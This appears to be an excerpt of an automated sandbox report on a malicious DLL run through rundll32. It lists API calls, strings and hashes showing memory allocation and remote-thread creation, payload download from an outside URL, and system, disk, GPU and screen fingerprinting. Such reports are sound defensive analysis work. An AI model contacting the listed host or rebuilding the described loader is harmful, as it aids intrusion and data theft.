                              • _memset.LIBCMT ref: 04DBBDFA
                              • GetDIBits.GDI32(?,?,00000000,00000000,?,00000028,00000000), ref: 04DBBE17
                              • _memset.LIBCMT ref: 04DBBE2F
                                • Part of subcall function 04DBF667: _malloc.LIBCMT ref: 04DBF681
                              • DeleteObject.GDI32(?), ref: 04DBBEA3
                              • DeleteObject.GDI32(?), ref: 04DBBEAD
                              • ReleaseDC.USER32(00000000,?), ref: 04DBBEB9
                              • DeleteObject.GDI32(?), ref: 04DBBF5F
                              • DeleteObject.GDI32(?), ref: 04DBBF69
                              • ReleaseDC.USER32(00000000,?), ref: 04DBBF75
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: MetricsSystem$Object$Delete$Release$CapsCompatibleCreateDeviceStretch_memset$BitmapBitsDesktopModeSelectWindow_malloc
                              • String ID: ($6$gfff$gfff
                              • API String ID: 3293817703-713438465
                              • Opcode ID: 1f0cf5e62dffb0b38b7f3e6b62dc3e33128c1d42c05e771aff72130b3096e617
                              • Instruction ID: c552d341c32e2857f0466319832c9ed6d0c00c9c7ad6a1fbb1a33f4d95b5d448
                              • Opcode Fuzzy Hash: 1f0cf5e62dffb0b38b7f3e6b62dc3e33128c1d42c05e771aff72130b3096e617
                              • Instruction Fuzzy Hash: 56D13AB1E01308EFDB14DFE5E885A9EBBB9FF48700F10452AE546AB340D774A945CBA1
                              APIs
                              • SetThreadErrorMode.KERNEL32(?,00000000), ref: 6CBC39A8
                              • GetProcAddress.KERNEL32(?,?), ref: 6CBC3A21
                              • GetProcAddress.KERNEL32(?,?), ref: 6CBC3AFB
                              • GetProcAddress.KERNEL32(?,?), ref: 6CBC3BD5
                              Strings
                              • https://dcttx.com/19/7.txtFailed to download text, xrefs: 6CBC3C62
                              • Failed to download file, xrefs: 6CBC59EC
                              • NtFreeVirtualMemoryFailed to find NtFreeVirtualMemory, xrefs: 6CBC3B81
                              • */*, xrefs: 6CBC3DFC
                              • NtCreateThreadExFailed to find NtCreateThreadEx, xrefs: 6CBC3AA7
                              • NtAllocateVirtualMemoryFailed to find NtAllocateVirtualMemory, xrefs: 6CBC39CD
                              • charset, xrefs: 6CBC3FF9, 6CBC4070, 6CBC489A
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: AddressProc$ErrorModeThread
                              • String ID: */*$Failed to download file$NtAllocateVirtualMemoryFailed to find NtAllocateVirtualMemory$NtCreateThreadExFailed to find NtCreateThreadEx$NtFreeVirtualMemoryFailed to find NtFreeVirtualMemory$charset$https://dcttx.com/19/7.txtFailed to download text
                              • API String ID: 964953106-2649344374
                              • Opcode ID: 3ead328e1097c77ca52ea4421b05985d7463562bdb754750535ad016d3074646
                              • Instruction ID: d28c573dd20d62a10833e652650c12514e3775a75e8e3f14582f582d101af52b
                              • Opcode Fuzzy Hash: 3ead328e1097c77ca52ea4421b05985d7463562bdb754750535ad016d3074646
                              • Instruction Fuzzy Hash: A2F26A716093819FD724CF29C490BABB7E1EFC9314F10892EE8999BB51DB309949CB53
                              APIs
                              • CertFreeCertificateContext.CRYPT32(?), ref: 6CC36EDA
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC36EDD
                              • CertGetCertificateChain.CRYPT32(00000000,?,00000000,00000000,?,C0000001,00000000,00000000), ref: 6CC36F7F
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC37026
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC37049
                              • GetLastError.KERNEL32 ref: 6CC3705F
                              • CertFreeCertificateContext.CRYPT32 ref: 6CC37091
                              • CertFreeCertificateChain.CRYPT32(?), ref: 6CC370CA
                              • CertVerifyCertificateChainPolicy.CRYPT32(00000004,?,?,00000010), ref: 6CC37144
                              • CertFreeCertificateContext.CRYPT32(?), ref: 6CC37247
                              • AcceptSecurityContext.SECUR32(?,?,?,0001011C,00000000,?,?,?,00000000), ref: 6CC3743A
                              • InitializeSecurityContextW.SECUR32(?,?,00000000,0009819C,00000000,00000000,?,00000000,00000000,?,?,00000000), ref: 6CC374A9
                              • FreeContextBuffer.SECUR32(?), ref: 6CC374C1
                              • FreeContextBuffer.SECUR32(00000000), ref: 6CC37565
                              • FreeContextBuffer.SECUR32(?), ref: 6CC375F6
                              • CertFreeCertificateChain.CRYPT32(?), ref: 6CC376F2
                              • CertFreeCertificateContext.CRYPT32(?), ref: 6CC376FD
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: ContextFree$CertCertificate$Chain$Buffer$Security$AcceptErrorInitializeLastPolicyVerify
                              • String ID: P(Hu$unexpected EOF during handshakeassertion failed: size >= nread
                              • API String ID: 619209709-78324864
                              • Opcode ID: 7dc3a09448bed33a2d04c64bbe66b069001c8a24368d4c75e1658141c0aa0624
                              • Instruction ID: f8cc430774f914b761b3a88491b565c8acf0f5e10c63c00542d6970d8babe80f
                              • Opcode Fuzzy Hash: 7dc3a09448bed33a2d04c64bbe66b069001c8a24368d4c75e1658141c0aa0624
                              • Instruction Fuzzy Hash: D6629870608751DFD314CF25D580B9ABBF1BF86318F10991DE8998BB81EB74E849CB92

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2043 4db6a00-4db6a73 call 4dbef4e GetCurrentProcessId wsprintfW call 4db68a0 call 4dc67e0 GetVersionExW 2050 4db6a79-4db6a80 2043->2050 2051 4db6b76-4db6b7c 2043->2051 2050->2051 2053 4db6a86-4db6a8d 2050->2053 2052 4db6ba4-4db6bb1 wsprintfW 2051->2052 2055 4db6bb4-4db6bb6 2052->2055 2053->2051 2054 4db6a93-4db6ab1 GetCurrentProcess OpenProcessToken 2053->2054 2054->2051 2056 4db6ab7-4db6ad7 GetTokenInformation 2054->2056 2057 4db6bb8-4db6bbe call 4dbfa29 2055->2057 2058 4db6bc1-4db6bd6 call 4dbef64 2055->2058 2059 4db6b4b-4db6b5e CloseHandle 2056->2059 2060 4db6ad9-4db6ae2 GetLastError 2056->2060 2057->2058 2065 4db6b60 2059->2065 2066 4db6b86-4db6b8c 2059->2066 2060->2059 2063 4db6ae4-4db6afb LocalAlloc 2060->2063 2063->2059 2070 4db6afd-4db6b1d GetTokenInformation 2063->2070 2071 4db6b7e-4db6b84 2065->2071 2072 4db6b62-4db6b64 2065->2072 2068 4db6b9e-4db6b9f 2066->2068 2069 4db6b8e-4db6b94 2066->2069 2068->2052 2069->2055 2073 4db6b96-4db6b9c 2069->2073 2074 4db6b1f-4db6b3c GetSidSubAuthorityCount GetSidSubAuthority 2070->2074 2075 4db6b3e-4db6b45 LocalFree 2070->2075 2071->2052 2072->2051 2076 4db6b66-4db6b6c 2072->2076 2073->2052 2074->2075 2075->2059 2076->2055 2077 4db6b6e-4db6b74 2076->2077 2077->2052
                              APIs
                              • GetCurrentProcessId.KERNEL32(00000994), ref: 04DB6A24
                              • wsprintfW.USER32 ref: 04DB6A37
                                • Part of subcall function 04DB68A0: GetCurrentProcessId.KERNEL32(B7FCE562,00000000,00000000,00000994,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68C8
                                • Part of subcall function 04DB68A0: OpenProcess.KERNEL32(00000400,00000000,00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68D7
                                • Part of subcall function 04DB68A0: OpenProcessToken.ADVAPI32(00000000,00000008,00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68F0
                                • Part of subcall function 04DB68A0: CloseHandle.KERNEL32(00000000,?,00000000,04DD10DB,000000FF,?,04DB6A43,00000000), ref: 04DB68FB
                              • _memset.LIBCMT ref: 04DB6A52
                              • GetVersionExW.KERNEL32(?), ref: 04DB6A6B
                              • GetCurrentProcess.KERNEL32(00000008,?), ref: 04DB6AA2
                              • OpenProcessToken.ADVAPI32(00000000), ref: 04DB6AA9
                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04DB6ACF
                              • GetLastError.KERNEL32 ref: 04DB6AD9
                              • LocalAlloc.KERNEL32(00000040,?), ref: 04DB6AED
                              • GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 04DB6B15
                              • GetSidSubAuthorityCount.ADVAPI32 ref: 04DB6B28
                              • GetSidSubAuthority.ADVAPI32(00000000), ref: 04DB6B36
                              • LocalFree.KERNEL32(?), ref: 04DB6B45
                              • CloseHandle.KERNEL32(?), ref: 04DB6B52
                              • wsprintfW.USER32 ref: 04DB6BAB
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Process$Token$CurrentOpen$AuthorityCloseHandleInformationLocalwsprintf$AllocCountErrorFreeLastVersion_memset
                              • String ID: -N/$NO/$None/%s
                              • API String ID: 3036438616-3095023699
                              • Opcode ID: 2628c30ef4bc23121bbcd2557f460fbc437b14775b2d5568fede9b60162981c8
                              • Instruction ID: 3c0d97a154b5dcb326ccd2e72e7494f90b5c0fed6203f7ba4d86f1c4fa1dbd29
                              • Opcode Fuzzy Hash: 2628c30ef4bc23121bbcd2557f460fbc437b14775b2d5568fede9b60162981c8
                              • Instruction Fuzzy Hash: C8419371A01214EFDB249F60DC99FEA7778EF09714F0041D9F68A96240DA34ED94CFA6
                              APIs
                              • memmove.VCRUNTIME140(?,?,00000098), ref: 6CC08586
                              • memmove.VCRUNTIME140(?,?,00000088), ref: 6CC0860E
                              • memmove.VCRUNTIME140(?,?,00000088,?), ref: 6CC08CD6
                              • memset.VCRUNTIME140(?,000000FF,?), ref: 6CC08DF7
                                • Part of subcall function 6CBC5AD0: RtlFreeHeap.NTDLL(00000000,?,6CC47E44), ref: 6CBC5AE1
                              • memmove.VCRUNTIME140(?,?,00000088), ref: 6CC094CF
                              • memmove.VCRUNTIME140(?,00000000,00000090), ref: 6CC099D5
                              • memmove.VCRUNTIME140(?,?,00000090), ref: 6CC09ADA
                              • memmove.VCRUNTIME140(?,?,000000F0), ref: 6CC09B83
                              • memmove.VCRUNTIME140(?,?,00000138), ref: 6CC0AC2B
                              • memmove.VCRUNTIME140(?,?,00000108), ref: 6CC0AC48
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$FreeHeapmemset
                              • String ID: C$C$Map must not be polled after it returned `Poll::Ready`$called `Result::unwrap()` on an `Err` value$connection error$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs$keep-aliveHTTP/1.1 100 Continueinternal error: entered unreachable code: poll_read_body invalid state: $send stream capacity unexpectedly closedD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\io\util\write_all.rs
                              • API String ID: 217009222-2210599076
                              • Opcode ID: d2c9536805c1caaf4d7185fd1169156f551da1d9ad0eab45f31f68ef9bfc2618
                              • Instruction ID: 1a6824e64bee8304de0971e87a0111db7fe71ad1ac9be921d50015c3f75ef4e7
                              • Opcode Fuzzy Hash: d2c9536805c1caaf4d7185fd1169156f551da1d9ad0eab45f31f68ef9bfc2618
                              • Instruction Fuzzy Hash: BE434575A087818BD771CF24C4907DFB7E1BFC9308F14891EE8999B641EB71A989CB42
                              APIs
                              • GetLogicalDriveStringsW.KERNEL32(000003E8,?,00000AD4,75BF73E0,00000000), ref: 04DB80A2
                              • lstrcmpiW.KERNEL32(?,A:\), ref: 04DB80D6
                              • lstrcmpiW.KERNEL32(?,B:\), ref: 04DB80E6
                              • QueryDosDeviceW.KERNEL32(?,?,00000064), ref: 04DB8116
                              • lstrlenW.KERNEL32(?), ref: 04DB8127
                              • __wcsnicmp.LIBCMT ref: 04DB813E
                              • lstrcpyW.KERNEL32(00000AD4,?), ref: 04DB8174
                              • lstrcpyW.KERNEL32(?,?), ref: 04DB8198
                              • lstrcatW.KERNEL32(?,00000000), ref: 04DB81A3
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: lstrcmpilstrcpy$DeviceDriveLogicalQueryStrings__wcsnicmplstrcatlstrlen
                              • String ID: A:\$B:\
                              • API String ID: 950920757-1009255891
                              • Opcode ID: 58fdfcfa8d41c2fccefa7a6b6b7835fca6e156fa705adfc009f3c2e5ffb3ee08
                              • Instruction ID: ab3de4f92bb7c33fa92bdc77036775b319ec95ae724bcf43c7586ea6a6b25ab2
                              • Opcode Fuzzy Hash: 58fdfcfa8d41c2fccefa7a6b6b7835fca6e156fa705adfc009f3c2e5ffb3ee08
                              • Instruction Fuzzy Hash: B4415671A02218DBDB20EF65DD94AEEB3BCFF44710F0441D9E90AA3240E774AE05DB94
                              APIs
                              • GetDriveTypeW.KERNEL32(?,75BF73E0,00000000), ref: 04DB6C18
                              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 04DB6C34
                              • _memset.LIBCMT ref: 04DB6C6B
                              • GlobalMemoryStatusEx.KERNEL32(?), ref: 04DB6C7E
                              • swprintf.LIBCMT ref: 04DB6CC3
                              • swprintf.LIBCMT ref: 04DB6CD6
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: swprintf$DiskDriveFreeGlobalMemorySpaceStatusType_memset
                              • String ID: %sFree%d Gb $:$@$HDD:%d
                              • API String ID: 3202570353-3501811827
                              • Opcode ID: be8e0345bb8bfeccb3caa0ee216c8d2960e31492856be17b05d3953bb07272b0
                              • Instruction ID: f76b484f73fc7577b62c921dc78f096a07f2eef8f1d3eaba0c89c20e39878950
                              • Opcode Fuzzy Hash: be8e0345bb8bfeccb3caa0ee216c8d2960e31492856be17b05d3953bb07272b0
                              • Instruction Fuzzy Hash: DA315CB2E0021CABDB14CFE5CC55FEEBBB9FB88700F50421DE906A7240EA746905CB91
                              APIs
                              • memmove.VCRUNTIME140(00000000,?,00000150), ref: 6CC1B39A
                              • memmove.VCRUNTIME140(?,00000000,00000094,?,6CCB3F94,6CCB3FDC), ref: 6CC1B585
                              • memmove.VCRUNTIME140(?,?,00000094,?,?,?,?,6CCB3F94,6CCB3FDC), ref: 6CC1B5B2
                              • memmove.VCRUNTIME140(?,?,00000094,?,?,?,?,?,?,?,6CCB3F94,6CCB3FDC), ref: 6CC1B5DC
                              Strings
                              • ALPN upgraded to HTTP/2, xrefs: 6CC1B805
                              • TryFlatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\try_future\try_flatten.rs, xrefs: 6CC22779
                              • called `Result::unwrap()` on an `Err` value, xrefs: 6CC22905
                              • , xrefs: 6CC1B1A2
                              • internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs, xrefs: 6CC22743, 6CC22767
                              • Map must not be polled after it returned `Poll::Ready`, xrefs: 6CC22755
                              • assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs, xrefs: 6CC227AC
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: $ALPN upgraded to HTTP/2$Map must not be polled after it returned `Poll::Ready`$TryFlatten polled after completionD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-util-0.3.31\src\future\try_future\try_flatten.rs$assertion failed: DEFAULT_MAX_FRAME_SIZE <= val && val <= MAX_MAX_FRAME_SIZED:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\h2-0.3.26\src\frame\settings.rs$called `Result::unwrap()` on an `Err` value$internal error: entered unreachable codeD:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\tokio-1.42.0\src\runtime\blocking\schedule.rs
                              • API String ID: 2162964266-4189558408
                              • Opcode ID: a7ae9b6f6cbf898832acb169982e8da54d6f91c7b664a039fe86bf54ccc23e4e
                              • Instruction ID: 697ccaf459c9d38d50f5d62c6f957d63f8faa4aab2993ac404abba0eb36f0326
                              • Opcode Fuzzy Hash: a7ae9b6f6cbf898832acb169982e8da54d6f91c7b664a039fe86bf54ccc23e4e
                              • Instruction Fuzzy Hash: A5928B7560C7818FC325CF29C4907DAB7E1BFC9314F148A6EE5989BB81EB709949CB42
                              APIs
                              • CreateDXGIFactory.DXGI(04DD579C,?,B7FCE562,75BF73E0,00000000,00000412), ref: 04DB6ECA
                              • swprintf.LIBCMT ref: 04DB709E
                              • std::_Xinvalid_argument.LIBCPMT ref: 04DB7147
                              Strings
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: CreateFactoryXinvalid_argumentstd::_swprintf
                              • String ID: %s%s %d %d $%s%s %d*%d $vector<T> too long
                              • API String ID: 3803070356-257307503
                              • Opcode ID: d89a5aee4d36d88fbc374e2c6bb3784006f711477105325f31350f437b9e750f
                              • Instruction ID: 41a18e2b1ae4a6f2103a953d5bb494419b69534f179e5e3346991e71ab0301aa
                              • Opcode Fuzzy Hash: d89a5aee4d36d88fbc374e2c6bb3784006f711477105325f31350f437b9e750f
                              • Instruction Fuzzy Hash: 6AE14371B01225DFDF24DE64CC90BEEB3B5FB89700F1445A9E95AA7384D630AE818F91
                              APIs
                              • SetUnhandledExceptionFilter.KERNEL32(Function_00006510), ref: 04206535
                              • GetConsoleWindow.KERNEL32(00000000), ref: 0420653D
                              • ShowWindow.USER32(00000000), ref: 04206544
                              • GetCurrentThreadId.KERNEL32 ref: 04206550
                              • PostThreadMessageA.USER32(00000000), ref: 04206557
                              • GetInputState.USER32 ref: 0420655D
                                • Part of subcall function 04205E40: _memset.LIBCMT ref: 04205E71
                              • CreateThread.KERNEL32(00000000,00000000,Function_00006120,00000000,00000000,00000000), ref: 04206577
                              • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 04206585
                              • CloseHandle.KERNEL32(?), ref: 04206591
                              • Sleep.KERNEL32(0000012C), ref: 0420659C
                              Memory Dump Source
                              • Source File: 00000003.00000002.3543705474.0000000004200000.00000040.00001000.00020000.00000000.sdmp, Offset: 04200000, based on PE: true
                              • Associated: 00000003.00000002.3543705474.000000000421F000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4200000_rundll32.jbxd
                              Similarity
                              • API ID: Thread$Window$CloseConsoleCreateCurrentExceptionFilterHandleInputMessageObjectPostShowSingleSleepStateUnhandledWait_memset
                              • String ID:
                              • API String ID: 1910205397-0
                              • Opcode ID: 03c1ba969e12ace4f0867b769593c36ce549377d03994c49e401f609ae479601
                              • Instruction ID: 70ed8bd288487de7d729e5b9c7ac20ad2e90b4e61247d439e5149713caed7bfe
                              • Opcode Fuzzy Hash: 03c1ba969e12ace4f0867b769593c36ce549377d03994c49e401f609ae479601
                              • Instruction Fuzzy Hash: 28F06771795200BBE7516FF8FC0EB093A64FBACB02F504590B315DA1E0CEBC68808B65
                              APIs
                                • Part of subcall function 6CC59BE5: CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000,?,?,00000001,?,6CC39DB2), ref: 6CC59C14
                              • memmove.VCRUNTIME140(00000000,?,00000138), ref: 6CC3A3D9
                              • memmove.VCRUNTIME140(?,?,00000138), ref: 6CC3A567
                              • memmove.VCRUNTIME140(00000004,?,00000158), ref: 6CC3A606
                              Strings
                              • =, xrefs: 6CC39D6F
                              • cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs, xrefs: 6CC3BA20, 6CC3BA94
                              • Failed to `Enter::block_on`, xrefs: 6CC3B953
                              • failed to park thread, xrefs: 6CC3B9EA
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove$CompletionCreatePort
                              • String ID: =$Failed to `Enter::block_on`$cannot access a Thread Local Storage value during or after destruction/rustc/f6e511eec7342f59a25f7c0534f1dbea00d01b14\library\std\src\thread\local.rs$failed to park thread
                              • API String ID: 613624600-1090645739
                              • Opcode ID: 1ad9b2b18a17bdf7bfc6bac0351c4c044277ed3f12171b6a0159504864aaa18c
                              • Instruction ID: 045119d96bb2638879dd87021de786bac5b512def1130354673c4f71af6bf64d
                              • Opcode Fuzzy Hash: 1ad9b2b18a17bdf7bfc6bac0351c4c044277ed3f12171b6a0159504864aaa18c
                              • Instruction Fuzzy Hash: 570388716087918FC725CF29D4907AAB7F1BFC9308F14896DD88D8BB51EB309959CB82
                              APIs
                              • memmove.VCRUNTIME140(?,?,000000D0), ref: 6CC290FF
                              • memmove.VCRUNTIME140(00000003,?,00000098), ref: 6CC2946E
                              Strings
                              • cookie2too many redirectsassertion failed: slot.is_none()D:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\oneshot.rs, xrefs: 6CC29ADA
                              • L, xrefs: 6CC29B3C
                              • Pending error polled more than once, xrefs: 6CC29143
                              • ., xrefs: 6CC294F1
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: memmove
                              • String ID: .$L$Pending error polled more than once$cookie2too many redirectsassertion failed: slot.is_none()D:\rust\cargo\registry\src\index.crates.io-6f17d22bba15001f\futures-channel-0.3.31\src\oneshot.rs
                              • API String ID: 2162964266-3828590624
                              • Opcode ID: baf883ee94bd6e327904e48ebc54efe2c15739c0ea5f370a4da1912d954afdae
                              • Instruction ID: 345d8401b4f7ac9c7ad0658fd75a40a7efd286afbb972d24557aa2f13f67f16b
                              • Opcode Fuzzy Hash: baf883ee94bd6e327904e48ebc54efe2c15739c0ea5f370a4da1912d954afdae
                              • Instruction Fuzzy Hash: 09B28F716087408BD725CF24C490BEEB7E1BFC5318F14892DE8999BB81EB75A849CB52
                              APIs
                              • NtCreateFile.NTDLL ref: 6CBF4879
                              • RtlNtStatusToDosError.NTDLL ref: 6CBF4884
                              • CreateIoCompletionPort.KERNEL32(?,?,00000000,00000000), ref: 6CBF48FB
                              • SetFileCompletionNotificationModes.KERNEL32(?,00000002), ref: 6CBF490B
                              Memory Dump Source
                              • Source File: 00000003.00000002.3546506472.000000006CBC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CBC0000, based on PE: true
                              • Associated: 00000003.00000002.3546466673.000000006CBC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546582023.000000006CC66000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546654462.000000006CCC2000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000003.00000002.3546679788.000000006CCC3000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_6cbc0000_rundll32.jbxd
                              Similarity
                              • API ID: CompletionCreateFile$ErrorModesNotificationPortStatus
                              • String ID:
                              • API String ID: 986160054-0
                              • Opcode ID: 8a17320c4addc1d2d740beca9f018256152d159cc1402b8a30e41b57f84e6260
                              • Instruction ID: 6d67ef3a4b6fce4d57cf8d1aeb910dc0d82fc81ee6cef3bfe16352e869e807b2
                              • Opcode Fuzzy Hash: 8a17320c4addc1d2d740beca9f018256152d159cc1402b8a30e41b57f84e6260
                              • Instruction Fuzzy Hash: 0341B8B1244345AFE7008F2ACA41B6ABBF0FB05715F14892DE1A9CB782D774E846CB51
                              APIs
                              • _memset.LIBCMT ref: 04DB600C
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 04DB6018
                              • Process32FirstW.KERNEL32(00000000,00000000), ref: 04DB6049
                              • Process32NextW.KERNEL32(00000000,0000022C), ref: 04DB609F
                              • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 04DB60A6
                              Memory Dump Source
                              • Source File: 00000003.00000002.3545390352.0000000004DB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04DB0000, based on PE: true
                              • Associated: 00000003.00000002.3545390352.0000000004DE4000.00000040.00001000.00020000.00000000.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_3_2_4db0000_rundll32.jbxd
                              Similarity
                              • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
